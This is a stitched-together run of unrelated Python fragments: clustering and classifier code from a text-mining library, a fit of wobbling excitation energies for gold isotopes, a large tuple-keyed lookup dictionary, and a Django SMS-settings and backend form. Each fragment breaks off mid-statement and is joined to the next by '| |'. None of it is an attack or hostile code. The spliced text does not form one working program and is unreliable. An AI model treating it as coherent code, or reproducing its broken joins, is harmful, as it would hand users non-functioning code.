if isinstance(item, Cluster) and depth > 0:
a.extend(item.flatten(depth-1))
else:
a.append(item)
return a
def traverse(self, visit=lambda cluster: None):
""" Calls the visit() function on this and each nested cluster.
"""
visit(self)
for item in self:
if isinstance(item, Cluster):
item.traverse(visit)
def __repr__(self):
return "Cluster(%s)" % list.__repr__(self)[1:-1]
def hierarchical(vectors, k=1, iterations=1000, distance=COSINE, **kwargs):
""" Returns a Cluster containing k items (vectors or clusters with nested items).
With k=1, the top-level cluster contains a single cluster.
"""
keys = kwargs.get("keys", list(features(vectors)))
clusters = Cluster((v for v in sorted(vectors, key=lambda x: random())))
centroids = [(v.id, v) for v in clusters]
map = {}
for _ in range(iterations):
if len(clusters) <= max(k, 1):
break
nearest, d0 = None, None
for i, (id1, v1) in enumerate(centroids):
for j, (id2, v2) in enumerate(centroids[i+1:]):
# Cache the distance calculations between vectors.
# Code is identical to DistanceMap.distance(),
# but it is faster in the inner loop to use it directly.
try:
d = map[(id1, id2)]
except KeyError:
d = map[(id1, id2)] = _distance(v1, v2, method=distance)
if d0 is None or d < d0:
nearest, d0 = (i, j+i+1), d
# Pairs of nearest clusters are merged as we move up the hierarchy:
i, j = nearest
merged = Cluster((clusters[i], clusters[j]))
clusters.pop(j)
clusters.pop(i)
clusters.append(merged)
# Cache the center of the new cluster.
v = centroid(merged.flatten(), keys)
centroids.pop(j)
centroids.pop(i)
centroids.append((v.id, v))
return clusters
#v1 = Vector(wings=0, beak=0, claws=1, paws=1, fur=1) # cat
#v2 = Vector(wings=0, beak=0, claws=0, paws=1, fur=1) # dog
#v3 = Vector(wings=1, beak=1, claws=1, paws=0, fur=0) # bird
#print hierarchical([v1, v2, v3])
#### CLASSIFIER ####################################################################################
#--- CLASSIFIER BASE CLASS -------------------------------------------------------------------------
# The baseline (default predicted class) is set to the most frequent class:
FREQUENCY = "frequency"
class Classifier:
def __init__(self, train=[], baseline=FREQUENCY):
self._classes = {}
self._baseline = baseline
# Train on the list of Document objects or (document, type)-tuples:
for d in (isinstance(d, Document) and (d, d.type) or d for d in train):
self.train(*d)
# In Pattern 2.5-, Classifier.test() is a classmethod.
# In Pattern 2.6+, it is replaced with Classifier._test() once instantiated.
self.test = self._test
@property
def features(self):
""" Yields a list of trained features.
"""
# Must be implemented in a subclass.
return []
@property
def classes(self):
""" Yields a list of trained classes.
"""
return self._classes.keys()
terms, types = features, classes
@property
def binary(self):
""" Yields True if the classifier predicts either True (0) or False (1).
"""
return sorted(self.classes) in ([False, True], [0, 1])
@property
def distribution(self):
""" Yields a dictionary of trained (class, frequency)-items.
"""
return self._classes.copy()
@property
def majority(self):
""" Yields the majority class (= most frequent class).
"""
d = sorted((v, k) for k, v in self._classes.iteritems())
return d and d[-1][1] or None
@property
def minority(self):
""" Yields the minority class (= least frequent class).
"""
d = sorted((v, k) for k, v in self._classes.iteritems())
return d and d[0][1] or None
@property
def baseline(self):
""" Yields the most frequent class in the training data,
or a user-defined class if Classifier(baseline != FREQUENCY).
"""
if self._baseline != FREQUENCY:
return self._baseline
return ([(0, None)] + sorted([(v, k) for k, v in self._classes.iteritems()]))[-1][1]
@property
def skewness(self):
""" Yields 0.0 if the classes are evenly distributed.
Yields > +1.0 or < -1.0 if the training data is highly skewed.
"""
def moment(a, m, k=1):
return sum([(x-m)**k for x in a]) / (len(a) or 1)
# List each training instance by an int that represents its class:
a = list(chain(*([i] * v for i, (k, v) in enumerate(self._classes.iteritems()))))
m = float(sum(a)) / len(a) # mean
return moment(a, m, 3) / (moment(a, m, 2) ** 1.5 or 1)
def train(self, document, type=None):
""" Trains the classifier with the given document of the given type (i.e., class).
A document can be a Document object, list or dictionary.
If no type is given, Document.type will be used instead.
"""
# Must be implemented in a subclass.
if type is None and isinstance(document, Document):
type = document.type
if type not in self._classes:
self._classes[type] = 0
self._classes[type] += 1
def classify(self, document):
""" Returns the type with the highest probability for the given document.
"""
# Must be implemented in | |
<filename>src/python/excitation_energies_fit/energies.py
import numpy as np
import plot
class Files:
# main directory where everything is stored
blobs = 'assets/'
data_directory = blobs + 'data/'
plot_directory = blobs + 'plots/'
# store the experimental data for 183Au
AU_183_DATA_POSITIVE = data_directory + '183_positive_data.md'
AU_183_DATA_NEGATIVE = data_directory + '183_negative_data.md'
# store the experimental data for 187Au
# AU_187_DATA_POSITIVE = data_directory + '187_positive_data.md'
AU_187_DATA_NEGATIVE = data_directory + '187_negative_data.md'
# store the plots for 183Au
AU_183_POSITIVE_ENERGY_PLOT = plot_directory + '183_positive_energies_plot.pdf'
AU_183_NEGATIVE_ENERGY_PLOT = plot_directory + '183_negative_energies_plot.pdf'
# store the plots for 187Au
# AU_187_POSITIVE_ENERGY_PLOT = plot_directory + '187_positive_energies_plot.pdf'
AU_187_NEGATIVE_ENERGY_PLOT = plot_directory + '187_negative_energies_plot.pdf'
AU_183_POSITIVE_FIT_DATA = data_directory + '183_Positive_Fit_Data.dat'
AU_183_NEGATIVE_FIT_DATA = data_directory + '183_Negative_Fit_Data.dat'
AU_187_FIT_DATA = data_directory + '187_Fit_Data.dat'
class Extract_Data:
@staticmethod
def Get_Energies(data_file):
YRAST = []
TW1 = []
with open(data_file, 'r+') as data_reader:
raw_data = data_reader.readlines()
label = str(raw_data[0]).strip()
raw_data.pop(0)
clean_data = [line.strip() for line in raw_data]
for line in clean_data:
wobbling_phonon, spin, energy = line.split(" ")
if(int(wobbling_phonon) == 1):
TW1.append(
[float(spin), int(wobbling_phonon), float(energy)])
if(int(wobbling_phonon) == 0):
YRAST.append(
[float(spin), int(wobbling_phonon), float(energy)])
return YRAST, TW1, label
class Energy_Formula:
FAIL_VALUE = 6969.6969
@staticmethod
def MeV(band):
band = [[e[0], e[1], float(e[2] / 1000.0)] for e in band]
return band
@staticmethod
def IsNAN_Asserter(arg, assert_value):
try:
assert np.isnan(arg) == assert_value
except AssertionError:
return None
else:
return arg
@staticmethod
def Inertia_Factor(MOI):
return 1.0 / (2.0 * MOI)
@staticmethod
def Radians(angle):
return angle * np.pi / 180.0
@staticmethod
def B_Term(spin, odd_spin, I1, I2, I3, V, gamma):
A1 = Energy_Formula.Inertia_Factor(I1)
A2 = Energy_Formula.Inertia_Factor(I2)
A3 = Energy_Formula.Inertia_Factor(I3)
I = spin
j = odd_spin
gm = Energy_Formula.Radians(gamma)
rad3 = np.sqrt(3.0)
cosg = np.cos(gm)
sing = np.sin(gm)
t1 = (2.0 * I - 1.0) * (A3 - A1) + 2.0 * j * A1
t2 = (2.0 * I - 1.0) * (A2 - A1) + 2.0 * j * A1
t3 = (2.0 * j - 1.0) * (A3 - A1) + 2.0 * I * A1 + V * \
(2.0 * j - 1.0) / (j * (j + 1.0)) * rad3 * (rad3 * cosg + sing)
t4 = (2.0 * j - 1.0) * (A2 - A1) + 2.0 * I * A1 + V * \
(2.0 * j - 1.0) / (j * (j + 1.0)) * 2 * \
rad3 * sing
B = (t1 * t2) + (8.0 * A2 * A3 * I * j) + (t3 * t4)
return -1.0 * B
@staticmethod
def C_Term(spin, odd_spin, I1, I2, I3, V, gamma):
A1 = Energy_Formula.Inertia_Factor(I1)
A2 = Energy_Formula.Inertia_Factor(I2)
A3 = Energy_Formula.Inertia_Factor(I3)
I = spin
j = odd_spin
gm = Energy_Formula.Radians(gamma)
rad3 = np.sqrt(3.0)
cosg = np.cos(gm)
sing = np.sin(gm)
# sub_term1
t1_1 = (2.0 * I - 1.0) * (A3 - A1) + 2.0 * j * A1
t1_2 = (2.0 * j - 1.0) * (A3 - A1) + 2.0 * I * A1 + V * \
(2.0 * j - 1.0) / (j * (j + 1.0)) * rad3 * (rad3 * cosg + sing)
t1_3 = 4.0 * I * j * np.power(A3, 2)
T1 = t1_1 * t1_2 - t1_3
# sub_term2
t2_1 = (2.0 * I - 1.0) * (A2 - A1) + 2.0 * j * A1
t2_2 = (2.0 * j - 1.0) * (A2 - A1) + 2.0 * I * A1 + V * \
(2.0 * j - 1.0) / (j * (j + 1.0)) * 2 * rad3 * sing
t2_3 = 4.0 * I * j * np.power(A2, 2)
T2 = t2_1 * t2_2 - t2_3
C = T1 * T2
return C
@staticmethod
def H_Min(spin, odd_spin, I1, I2, I3, V, gamma):
A1 = Energy_Formula.Inertia_Factor(I1)
A2 = Energy_Formula.Inertia_Factor(I2)
A3 = Energy_Formula.Inertia_Factor(I3)
I = spin
j = odd_spin
gm = Energy_Formula.Radians(gamma)
pi6 = np.pi / 6.0
T1 = (A2 + A3) * (I + j) / 2.0
T2 = A1 * np.power(I - j, 2)
T3 = V * (2.0 * j - 1.0) / (j + 1.0) * np.sin(pi6 + gm)
H_MIN = T1 + T2 - T3
return H_MIN
@staticmethod
def Omega_Frequencies(spin, odd_spin, I1, I2, I3, V, gamma, reversed=False):
B = Energy_Formula.B_Term(spin, odd_spin, I1, I2, I3, V, gamma)
C = Energy_Formula.C_Term(spin, odd_spin, I1, I2, I3, V, gamma)
with np.errstate(invalid='ignore'):
SQRT = np.sqrt(np.power(B, 2) - 4.0 * C)
Omega_1 = np.sqrt(0.5 * (-B + SQRT))
Omega_2 = np.sqrt(0.5 * (-B - SQRT))
# with np.errstate(invalid='ignore'):
# SQRT = np.sqrt(np.power(B, 2) - 4.0 * C)
# valid_0 = Energy_Formula.IsNAN_Asserter(SQRT, False)
# if(DEBUG_MODE):
# if(valid_0 is None):
# print(f'Invalid SQRT term | v0={valid_0}')
# else:
# print(f'Valid SQRT term | v0={valid_0}')
# if(valid_0 is None):
# return []
# with np.errstate(invalid='ignore'):
# Omega_1 = np.sqrt(0.5 * (-B + SQRT))
# valid_1 = Energy_Formula.IsNAN_Asserter(Omega_1, False)
# if(DEBUG_MODE):
# if(valid_1 is None):
# print(f'Invalid Omega_1 | v1={valid_1}')
# else:
# print(f'Valid Omega_1 | v1={valid_1}')
# with np.errstate(invalid='ignore'):
# Omega_2 = np.sqrt(0.5 * (-B - SQRT))
# valid_2 = Energy_Formula.IsNAN_Asserter(Omega_2, False)
# if(DEBUG_MODE):
# if(valid_2 is None):
# print(f'Invalid Omega_2 | v2={valid_2}')
# else:
# print(f'Valid Omega_2 | v2={valid_2}')
# if(valid_1 is None or valid_2 is None):
# if(DEBUG_MODE):
# print('Invalid parameters for the wobbling frequencies ❌')
# print(f'Omegas: -> [{Omega_1} , {Omega_2}]')
# return []
# else:
# if(DEBUG_MODE):
# print('Valid parameters for the wobbling frequencies ✅')
# print(f'Omegas: -> [{Omega_1} , {Omega_2}]')
# return [Omega_1, Omega_2]
if(reversed):
return [Omega_2, Omega_1]
else:
return [Omega_1, Omega_2]
@staticmethod
def Energy_Expression(nw_1, nw_2, spin, odd_spin, I1, I2, I3, V, gamma):
H_MIN = Energy_Formula.H_Min(spin, odd_spin, I1, I2, I3, V, gamma)
# Use the reversed variable for the wobbling frequency ordering.
# Depending on its value, the frequencies will be interchanged for further computations
reversed = False
Omega_1, Omega_2 = Energy_Formula.Omega_Frequencies(
spin, odd_spin, I1, I2, I3, V, gamma, reversed)
# print(Omega_1)
# print(Omega_2)
E = H_MIN + Omega_1 * (nw_1 + 0.5) + Omega_2 * (nw_2 + 0.5)
return E
@staticmethod
def Excitation_Energy(nw_1, nw_2, spin, spin_zero, odd_spin, I1, I2, I3, V, gamma):
"""
Calculates the wobbling energy of a state with given spin, belonging to a particular band, by subtracting from its absolute value the value of the yrast band-head state with I=spin_zero.
"""
E_0 = Energy_Formula.Energy_Expression(
0, 0, spin_zero, odd_spin, I1, I2, I3, V, gamma)
E_I = Energy_Formula.Energy_Expression(
nw_1, nw_2, spin, odd_spin, I1, I2, I3, V, gamma)
E_EXC = E_I - E_0
return E_EXC
class Models:
@staticmethod
def Model_Energy_h9_2(X, P_1, P_2, P_3, P_4, P_5):
"""
Describes the analytical expressions for the energies that correspond to the negative parity states.
This is the model function that needs to be numerically fitted.
The argument X represents the spin I and the wobbling phonon number n_w -> X = [I, n_w1].
P represents the parameter set: P = [I1, I2, I3, V, gamma].
"""
DEBUG_MODE = False
# The band head of the negative parity sequences
# Band head corresponds to the first level of the yrast band
SPIN_ZERO = 4.5
# The odd single-particle angular momentum which couples to the triaxial even-even core
ODD_SPIN = 4.5
# unpack the spin and wobbling phonon number
spins, phonons = X
if(DEBUG_MODE):
print(f'in model ->Spins: {spins}\n nw_1: {phonons}')
model_function = Energy_Formula.Excitation_Energy(
phonons, 0, spins, SPIN_ZERO, ODD_SPIN, P_1, P_2, P_3, P_4, P_5)
if(DEBUG_MODE):
print(f'E_EXC(X,P) -> {model_function}')
return model_function
@staticmethod
def Model_Energy_i13_2(X, P_1, P_2, P_3, P_4, P_5):
"""
Describes the analytical expressions for the energies that correspond to the positive parity states.
This is the model function that needs to be numerically fitted.
The argument X represents the spin I and the wobbling phonon number n_w -> X = [I, n_w1].
P represents the parameter set: P = [I1, I2, I3, V, gamma].
"""
DEBUG_MODE = False
# The band head of the positive parity sequences
# Band head corresponds to the first level of the yrast band
SPIN_ZERO = 6.5
# The odd single-particle | |
20, 1, 5): (-1, 1),
(6, 20, 2, -5): (0, 1),
(6, 20, 2, -4): (0, 1),
(6, 20, 2, -3): (0, 1),
(6, 20, 2, -2): (0, 1),
(6, 20, 2, -1): (0, 1),
(6, 20, 2, 0): (-1, 1),
(6, 20, 2, 1): (-1, 1),
(6, 20, 2, 2): (-1, 1),
(6, 20, 2, 3): (-1, 0),
(6, 20, 2, 4): (-1, -1),
(6, 20, 2, 5): (-1, -1),
(6, 20, 3, -5): (1, 1),
(6, 20, 3, -4): (1, 1),
(6, 20, 3, -3): (1, 1),
(6, 20, 3, -2): (1, 0),
(6, 20, 3, -1): (1, 1),
(6, 20, 3, 0): (1, 1),
(6, 20, 3, 1): (1, 1),
(6, 20, 3, 2): (0, 1),
(6, 20, 3, 3): (0, 1),
(6, 20, 3, 4): (0, 1),
(6, 20, 3, 5): (0, 1),
(6, 20, 4, -5): (0, 1),
(6, 20, 4, -4): (0, 1),
(6, 20, 4, -3): (0, 1),
(6, 20, 4, -2): (0, 0),
(6, 20, 4, -1): (0, 1),
(6, 20, 4, 0): (0, 1),
(6, 20, 4, 1): (0, 1),
(6, 20, 4, 2): (-1, 1),
(6, 20, 4, 3): (-1, 1),
(6, 20, 4, 4): (-1, 1),
(6, 20, 4, 5): (-1, 1),
(6, 20, 5, -5): (0, 1),
(6, 20, 5, -4): (0, 1),
(6, 20, 5, -3): (0, 1),
(6, 20, 5, -2): (0, 0),
(6, 20, 5, -1): (0, 1),
(6, 20, 5, 0): (0, 1),
(6, 20, 5, 1): (0, 1),
(6, 20, 5, 2): (0, 1),
(6, 20, 5, 3): (0, 1),
(6, 20, 5, 4): (0, 1),
(6, 20, 5, 5): (0, 1),
(6, 21, -5, -5): (0, 1),
(6, 21, -5, -4): (0, 1),
(6, 21, -5, -3): (0, 0),
(6, 21, -5, -2): (0, 1),
(6, 21, -5, -1): (0, 1),
(6, 21, -5, 0): (0, 1),
(6, 21, -5, 1): (0, 1),
(6, 21, -5, 2): (0, 1),
(6, 21, -5, 3): (0, 1),
(6, 21, -5, 4): (0, 1),
(6, 21, -5, 5): (0, 1),
(6, 21, -4, -5): (0, 1),
(6, 21, -4, -4): (0, 1),
(6, 21, -4, -3): (0, 0),
(6, 21, -4, -2): (0, 1),
(6, 21, -4, -1): (0, 1),
(6, 21, -4, 0): (0, 1),
(6, 21, -4, 1): (0, 1),
(6, 21, -4, 2): (0, 1),
(6, 21, -4, 3): (0, 1),
(6, 21, -4, 4): (0, 1),
(6, 21, -4, 5): (0, 1),
(6, 21, -3, -5): (0, 1),
(6, 21, -3, -4): (0, 1),
(6, 21, -3, -3): (0, 0),
(6, 21, -3, -2): (0, 1),
(6, 21, -3, -1): (0, 1),
(6, 21, -3, 0): (0, 1),
(6, 21, -3, 1): (0, 1),
(6, 21, -3, 2): (0, 1),
(6, 21, -3, 3): (0, 1),
(6, 21, -3, 4): (0, 1),
(6, 21, -3, 5): (0, 1),
(6, 21, -2, -5): (0, 1),
(6, 21, -2, -4): (0, 1),
(6, 21, -2, -3): (0, 0),
(6, 21, -2, -2): (0, 1),
(6, 21, -2, -1): (0, 1),
(6, 21, -2, 0): (0, 1),
(6, 21, -2, 1): (0, 1),
(6, 21, -2, 2): (0, 1),
(6, 21, -2, 3): (0, 1),
(6, 21, -2, 4): (0, 1),
(6, 21, -2, 5): (0, 1),
(6, 21, -1, -5): (0, 1),
(6, 21, -1, -4): (0, 1),
(6, 21, -1, -3): (0, 0),
(6, 21, -1, -2): (0, 1),
(6, 21, -1, -1): (0, 1),
(6, 21, -1, 0): (1, 1),
(6, 21, -1, 1): (1, 1),
(6, 21, -1, 2): (1, 1),
(6, 21, -1, 3): (1, 1),
(6, 21, -1, 4): (1, 1),
(6, 21, -1, 5): (1, 0),
(6, 21, 0, -5): (-1, 1),
(6, 21, 0, -4): (-1, 1),
(6, 21, 0, -3): (-1, 0),
(6, 21, 0, -2): (-1, 1),
(6, 21, 0, -1): (1, 1),
(6, 21, 0, 0): (1, 1),
(6, 21, 0, 1): (1, 1),
(6, 21, 0, 2): (1, 1),
(6, 21, 0, 3): (0, 1),
(6, 21, 0, 4): (0, 1),
(6, 21, 0, 5): (0, 1),
(6, 21, 1, -5): (1, 1),
(6, 21, 1, -4): (1, 1),
(6, 21, 1, -3): (1, 1),
(6, 21, 1, -2): (1, 1),
(6, 21, 1, -1): (0, 1),
(6, 21, 1, 0): (0, 1),
(6, 21, 1, 1): (0, 1),
(6, 21, 1, 2): (0, 1),
(6, 21, 1, 3): (-1, 1),
(6, 21, 1, 4): (-1, 1),
(6, 21, 1, 5): (-1, 1),
(6, 21, 2, -5): (0, 1),
(6, 21, 2, -4): (0, 1),
(6, 21, 2, -3): (0, 1),
(6, 21, 2, -2): (0, 1),
(6, 21, 2, -1): (-1, 1),
(6, 21, 2, 0): (-1, 1),
(6, 21, 2, 1): (-1, 1),
(6, 21, 2, 2): (-1, 1),
(6, 21, 2, 3): (-1, 1),
(6, 21, 2, 4): (-1, 0),
(6, 21, 2, 5): (-1, -1),
(6, 21, 3, -5): (1, 1),
(6, 21, 3, -4): (1, 1),
(6, 21, 3, -3): (1, 0),
(6, 21, 3, -2): (1, 1),
(6, 21, 3, -1): (1, 1),
(6, 21, 3, 0): (1, 1),
(6, 21, 3, 1): (1, 1),
(6, 21, 3, 2): (0, 1),
(6, 21, 3, 3): (0, 1),
(6, 21, 3, 4): (1, 1),
(6, 21, 3, 5): (1, 0),
(6, 21, 4, -5): (0, 1),
(6, 21, 4, -4): (0, 1),
(6, 21, 4, -3): (0, 0),
(6, 21, 4, -2): (0, 1),
(6, 21, 4, -1): (0, 1),
(6, 21, 4, 0): (0, 1),
(6, 21, 4, 1): (0, 1),
(6, 21, 4, 2): (-1, 1),
(6, 21, 4, 3): (-1, 1),
(6, 21, 4, 4): (0, 1),
(6, 21, 4, 5): (0, 1),
(6, 21, 5, -5): (0, 1),
(6, 21, 5, -4): (0, 1),
(6, 21, 5, -3): (0, 0),
(6, 21, 5, -2): (0, 1),
(6, 21, 5, -1): (0, 1),
(6, 21, 5, 0): (0, 1),
(6, 21, 5, 1): (0, 1),
(6, 21, 5, 2): (0, 1),
(6, 21, 5, 3): (0, 1),
(6, 21, 5, 4): (0, 1),
(6, 21, 5, 5): (0, 1),
(6, 22, -5, -5): (0, 1),
(6, 22, -5, -4): (0, 0),
(6, 22, -5, -3): (0, 1),
(6, 22, -5, -2): (0, 1),
(6, 22, -5, -1): (0, 1),
(6, 22, -5, 0): (0, 1),
(6, 22, -5, 1): (0, 1),
(6, 22, -5, 2): (0, 1),
(6, 22, -5, 3): (0, 1),
(6, 22, -5, 4): (0, 1),
(6, 22, -5, 5): (0, 1),
(6, 22, -4, -5): (0, 1),
(6, 22, -4, -4): (0, 0),
(6, 22, -4, -3): (0, 1),
(6, 22, -4, -2): (0, 1),
(6, 22, -4, -1): (0, 1),
(6, 22, -4, 0): (0, 1),
(6, 22, -4, 1): (0, 1),
(6, 22, -4, 2): (0, 1),
(6, 22, -4, 3): (0, 1),
(6, 22, -4, 4): (0, 1),
(6, 22, -4, 5): (0, 1),
(6, 22, -3, -5): (0, 1),
(6, 22, -3, -4): (0, 0),
(6, 22, -3, -3): (0, 1),
(6, 22, -3, -2): (0, 1),
(6, 22, -3, -1): (0, 1),
(6, 22, -3, 0): (0, 1),
(6, 22, -3, 1): (0, 1),
(6, 22, -3, 2): (0, 1),
(6, 22, -3, 3): (0, 1),
(6, 22, -3, 4): (0, 1),
(6, 22, -3, 5): (0, 1),
(6, 22, -2, -5): (0, 1),
(6, 22, -2, -4): (0, 0),
(6, 22, -2, -3): (0, 1),
(6, 22, -2, -2): (0, 1),
(6, 22, -2, -1): (0, 1),
(6, 22, -2, 0): (0, 1),
(6, 22, -2, 1): (0, 1),
(6, 22, -2, 2): (0, 1),
(6, 22, -2, 3): (0, 1),
(6, 22, -2, 4): (0, 1),
(6, 22, -2, 5): (0, 1),
(6, 22, -1, -5): (0, 1),
(6, 22, -1, -4): (0, 0),
(6, 22, -1, -3): (0, 1),
(6, 22, -1, | |
counts as being read only "
"to the user who reads it."),
),
]
return crispy.Fieldset(
_("Chat Settings"),
*fields
)
@property
def section_internal(self):
return crispy.Fieldset(
_("Internal Settings (Dimagi Only)"),
hqcrispy.B3MultiField(
_("Override Daily Outbound SMS Limit"),
crispy.Div(
InlineField(
'override_daily_outbound_sms_limit',
data_bind='value: override_daily_outbound_sms_limit',
),
css_class='col-sm-4'
),
crispy.Div(
InlineField('custom_daily_outbound_sms_limit'),
data_bind="visible: override_daily_outbound_sms_limit() === '%s'" % ENABLED,
css_class='col-sm-8'
),
),
hqcrispy.B3MultiField(
_("Chat Template"),
crispy.Div(
InlineField(
"use_custom_chat_template",
data_bind="value: use_custom_chat_template",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"custom_chat_template",
data_bind="visible: showCustomChatTemplate",
),
css_class='col-sm-8'
),
help_bubble_text=_("To use a custom template to render the "
"chat window, enter it here."),
css_id="custom-chat-template-group",
),
)
@property
def sections(self):
result = [
self.section_general,
self.section_registration,
self.section_chat,
]
if self._cchq_is_previewer:
result.append(self.section_internal)
result.append(
hqcrispy.FormActions(
twbscrispy.StrictButton(
_("Save"),
type="submit",
css_class="btn-primary",
),
),
)
return result
def __init__(self, data=None, cchq_domain=None, cchq_is_previewer=False, *args, **kwargs):
self._cchq_domain = cchq_domain
self._cchq_is_previewer = cchq_is_previewer
super(SettingsForm, self).__init__(data, *args, **kwargs)
self.helper = HQFormHelper()
self.helper.layout = crispy.Layout(
*self.sections
)
self.restricted_sms_times_widget_context = {
"template_name": "ko-template-restricted-sms-times",
"explanation_text": _("SMS will only be sent when any of the following is true:"),
"ko_array_name": "restricted_sms_times",
"remove_window_method": "$parent.removeRestrictedSMSTime",
"add_window_method": "addRestrictedSMSTime",
}
self.sms_conversation_times_widget_context = {
"template_name": "ko-template-sms-conversation-times",
"explanation_text": _("Automated SMS will be suppressed during "
"chat conversations when any of the following "
"is true:"),
"ko_array_name": "sms_conversation_times",
"remove_window_method": "$parent.removeSMSConversationTime",
"add_window_method": "addSMSConversationTime",
}
@property
def enable_registration_welcome_sms_for_case(self):
return (self.cleaned_data.get('registration_welcome_message') in
(WELCOME_RECIPIENT_CASE, WELCOME_RECIPIENT_ALL))
@property
def enable_registration_welcome_sms_for_mobile_worker(self):
return (self.cleaned_data.get('registration_welcome_message') in
(WELCOME_RECIPIENT_MOBILE_WORKER, WELCOME_RECIPIENT_ALL))
@property
def current_values(self):
current_values = {}
for field_name in self.fields.keys():
value = self[field_name].value()
if field_name in ["restricted_sms_times_json", "sms_conversation_times_json"]:
if isinstance(value, str):
current_values[field_name] = json.loads(value)
else:
current_values[field_name] = value
elif field_name in ['sms_case_registration_owner_id', 'sms_case_registration_user_id']:
if value:
obj = self.get_user_group_or_location(value)
if isinstance(obj, SQLLocation):
current_values[field_name] = {'id': value, 'text': _("Organization: {}").format(obj.name)}
elif isinstance(obj, Group):
current_values[field_name] = {'id': value, 'text': _("User Group: {}").format(obj.name)}
elif isinstance(obj, CommCareUser):
current_values[field_name] = {'id': value, 'text': _("User: {}").format(obj.raw_username)}
else:
current_values[field_name] = value
return current_values
def _clean_dependent_field(self, bool_field, field):
if self.cleaned_data.get(bool_field):
value = self.cleaned_data.get(field, None)
if not value:
raise ValidationError(_("This field is required."))
return value
else:
return None
def clean_use_default_sms_response(self):
return self.cleaned_data.get("use_default_sms_response") == ENABLED
def clean_default_sms_response(self):
return self._clean_dependent_field("use_default_sms_response",
"default_sms_response")
def clean_use_custom_case_username(self):
return self.cleaned_data.get("use_custom_case_username") == CUSTOM
def clean_custom_case_username(self):
return self._clean_dependent_field("use_custom_case_username",
"custom_case_username")
def clean_use_custom_message_count_threshold(self):
return (self.cleaned_data.get("use_custom_message_count_threshold")
== CUSTOM)
def clean_custom_message_count_threshold(self):
value = self._clean_dependent_field("use_custom_message_count_threshold",
"custom_message_count_threshold")
if value is not None and value <= 0:
raise ValidationError(_("Please enter a positive number"))
return value
def clean_use_custom_chat_template(self):
if not self._cchq_is_previewer:
return None
return self.cleaned_data.get("use_custom_chat_template") == CUSTOM
def clean_custom_chat_template(self):
if not self._cchq_is_previewer:
return None
value = self._clean_dependent_field("use_custom_chat_template",
"custom_chat_template")
if value is not None and value not in settings.CUSTOM_CHAT_TEMPLATES:
raise ValidationError(_("Unknown custom template identifier."))
return value
def _clean_time_window_json(self, field_name):
try:
time_window_json = json.loads(self.cleaned_data.get(field_name))
except ValueError:
raise ValidationError(_("An error has occurred. Please try again, "
"and if the problem persists, please report an issue."))
result = []
for window in time_window_json:
day = window.get("day")
start_time = window.get("start_time")
end_time = window.get("end_time")
time_input_relationship = window.get("time_input_relationship")
try:
day = int(day)
assert day >= -1 and day <= 6
except (ValueError, AssertionError):
raise ValidationError(_("Invalid day chosen."))
if time_input_relationship == TIME_BEFORE:
end_time = validate_time(end_time)
result.append(DayTimeWindow(
day=day,
start_time=None,
end_time=end_time,
))
elif time_input_relationship == TIME_AFTER:
start_time = validate_time(start_time)
result.append(DayTimeWindow(
day=day,
start_time=start_time,
end_time=None,
))
else:
start_time = validate_time(start_time)
end_time = validate_time(end_time)
if start_time >= end_time:
raise ValidationError(_("End time must come after start "
"time."))
result.append(DayTimeWindow(
day=day,
start_time=start_time,
end_time=end_time,
))
return result
def clean_use_restricted_sms_times(self):
return self.cleaned_data.get("use_restricted_sms_times") == ENABLED
def clean_restricted_sms_times_json(self):
if self.cleaned_data.get("use_restricted_sms_times"):
return self._clean_time_window_json("restricted_sms_times_json")
else:
return []
def clean_use_sms_conversation_times(self):
return self.cleaned_data.get("use_sms_conversation_times") == ENABLED
def clean_sms_conversation_times_json(self):
if self.cleaned_data.get("use_sms_conversation_times"):
return self._clean_time_window_json("sms_conversation_times_json")
else:
return []
def clean_count_messages_as_read_by_anyone(self):
return (self.cleaned_data.get("count_messages_as_read_by_anyone")
== ENABLED)
def clean_sms_case_registration_enabled(self):
return (self.cleaned_data.get("sms_case_registration_enabled")
== ENABLED)
def clean_sms_case_registration_type(self):
return self._clean_dependent_field("sms_case_registration_enabled",
"sms_case_registration_type")
def get_user_group_or_location(self, object_id):
try:
return SQLLocation.active_objects.get(
domain=self._cchq_domain,
location_id=object_id,
location_type__shares_cases=True,
)
except SQLLocation.DoesNotExist:
pass
try:
group = Group.get(object_id)
if group.doc_type == 'Group' and group.domain == self._cchq_domain and group.case_sharing:
return group
elif group.is_deleted:
return None
except ResourceNotFound:
pass
return self.get_user(object_id)
def get_user(self, object_id):
try:
user = CommCareUser.get(object_id)
if user.doc_type == 'CommCareUser' and user.domain == self._cchq_domain:
return user
except ResourceNotFound:
pass
return None
def clean_sms_case_registration_owner_id(self):
if not self.cleaned_data.get("sms_case_registration_enabled"):
return None
value = self.cleaned_data.get("sms_case_registration_owner_id")
if not value:
raise ValidationError(_("This field is required."))
obj = self.get_user_group_or_location(value)
if not isinstance(obj, (CommCareUser, Group, SQLLocation)):
raise ValidationError(_("Please select again"))
return value
def clean_sms_case_registration_user_id(self):
if not self.cleaned_data.get("sms_case_registration_enabled"):
return None
value = self.cleaned_data.get("sms_case_registration_user_id")
if not value:
raise ValidationError(_("This field is required."))
obj = self.get_user(value)
if not isinstance(obj, CommCareUser):
raise ValidationError(_("Please select again"))
return value
def clean_sms_mobile_worker_registration_enabled(self):
return (self.cleaned_data.get("sms_mobile_worker_registration_enabled")
== ENABLED)
def clean_sms_conversation_length(self):
# Just cast to int, the ChoiceField will validate that it is an integer
return int(self.cleaned_data.get("sms_conversation_length"))
def clean_custom_daily_outbound_sms_limit(self):
if not self._cchq_is_previewer:
return None
if self.cleaned_data.get('override_daily_outbound_sms_limit') != ENABLED:
return None
value = self.cleaned_data.get("custom_daily_outbound_sms_limit")
if not value:
raise ValidationError(_("This field is required"))
return value
class BackendForm(Form):
_cchq_domain = None
_cchq_backend_id = None
name = CharField(
label=ugettext_noop("Name")
)
description = CharField(
label=ugettext_noop("Description"),
widget=forms.Textarea,
required=False,
)
give_other_domains_access = BooleanField(
required=False,
label=ugettext_noop("Give other domains access.")
)
authorized_domains = CharField(
required=False,
label=ugettext_noop("List of authorized domains")
)
reply_to_phone_number = CharField(
required=False,
label=ugettext_noop("Reply-To Phone Number"),
)
inbound_api_key = CharField(
required=False,
label=ugettext_lazy("Inbound API Key"),
disabled=True,
)
@property
def is_global_backend(self):
return self._cchq_domain is None
@property
def general_fields(self):
fields = [
crispy.Field('name', css_class='input-xxlarge'),
crispy.Field('description', css_class='input-xxlarge', rows="3"),
crispy.Field('reply_to_phone_number', css_class='input-xxlarge'),
]
if not self.is_global_backend:
fields.extend([
crispy.Field(
twbscrispy.PrependedText(
